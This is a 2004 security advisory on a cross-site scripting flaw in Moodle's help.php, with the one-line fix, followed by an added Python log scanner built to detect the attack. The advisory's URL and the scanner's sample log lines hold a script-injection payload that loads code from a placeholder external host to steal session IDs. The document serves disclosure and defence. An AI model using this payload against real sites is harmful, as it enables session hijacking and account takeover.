Cross Site Scripting in Moodle < 1.3

From: Bartek Nowotarski (silence10_at_wp.pl)
Date: 04/30/04

    Date: 30 Apr 2004 20:34:54 -0000
    To: bugtraq@securityfocus.com
    
    

                          Cross Site Scripting in Moodle < 1.3
                          ====================================
                                      2004-04-30

    [01] Author:
    ~~~~~~~~~~~~
    author: Bartek Nowotarski (silence)
    location: Trzebinia, Poland
    mail: silence10(at)wp(dot)pl
    site: silence(dot)0(dot)pl

    [02] Discussion:
    ~~~~~~~~~~~~~~~~
    "Moodle is a course management system (CMS) - a software package designed to
    help educators create quality online courses. Such e-learning systems are
    sometimes also called Learning Management Systems (LMS) or Virtual Learning
    Environments (VLE)." www.moodle.org
    It has over 1000 registered sites in 75 countries.

    Project home site: http://www.moodle.org

    [03] Bug:
    ~~~~~~~~~
    It is possible to execute arbitrary HTML/JavaScript through the help.php file
    by requesting:
    ------------------------------------------
    http://{some_moodle_site}/help.php?text=<script
    src={url_to_script_to_execute}></script>
    ------------------------------------------
    The code at {url_to_script_to_execute} will be executed.
    The bug makes it possible to obtain users' session IDs by writing a special
    script, and to use them to log in as any user.

    [04] Solution:
    ~~~~~~~~~~~~~~
    a) This bug has been fixed in version 1.3.
    b) For version 1.2 replace line 75:
        --------------------------------
    75| echo "$text";
        --------------------------------
    with
        --------------------------------
    75| echo clean_text($text);
        --------------------------------

    [05] Credits:
    ~~~~~~~~~~~~~
    Vulnerability discovered by Bartek Nowotarski (silence). All rights reserved.

    [06] Disclaimer:
    ~~~~~~~~~~~~~~~~
    This document and all the information it contains are provided "as is",
    for educational purposes only, without warranty of any kind, whether
    express or implied.

    --EOF--
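
Added example (not part of the original advisory): a log check a site operator could run to find requests matching the pattern in [03], that is, help.php hits whose `text` parameter decodes to HTML markup. The combined access-log format, the function names and the sample lines are assumptions constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# An opening/closing tag or comment start; plain help text has no reason to carry one.
MARKUP_RE = re.compile(r'<\s*[a-z/!]', re.I)


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_help_requests(log_lines):
    """Return (line_number, decoded_text) for help.php hits carrying markup."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        url = urlsplit(match.group(1))
        if not url.path.endswith("/help.php"):
            continue
        # parse_qs decodes once; decode_fully catches double-encoded values.
        for raw in parse_qs(url.query, keep_blank_values=True).get("text", []):
            text = decode_fully(raw)
            if MARKUP_RE.search(text):
                hits.append((number, text))
    return hits


# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Apr/2004:20:01:02 +0000] "GET /help.php HTTP/1.1" 200 812',
    '192.0.2.44 - - [30/Apr/2004:20:03:17 +0000] "GET /help.php?text=%3Cscript%20src%3Dhttp%3A%2F%2Fexample.invalid%2Fx.js%3E%3C%2Fscript%3E HTTP/1.1" 200 95',
    '192.0.2.44 - - [30/Apr/2004:20:03:40 +0000] "GET /help.php?text=%253Cscript%253E HTTP/1.1" 200 40',
    '192.0.2.51 - - [30/Apr/2004:20:05:09 +0000] "GET /help.php?text=Grades+are+shown+here HTTP/1.1" 200 60',
    '192.0.2.60 - - [30/Apr/2004:20:06:00 +0000] "GET /course/view.php?id=2 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, text in suspicious_help_requests(SAMPLE_LOG):
        print(f"line {number}: text={text!r}")
```

A hit only shows that such a request reached the server; whether the markup was rendered depends on whether the fix from [04] is in place.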

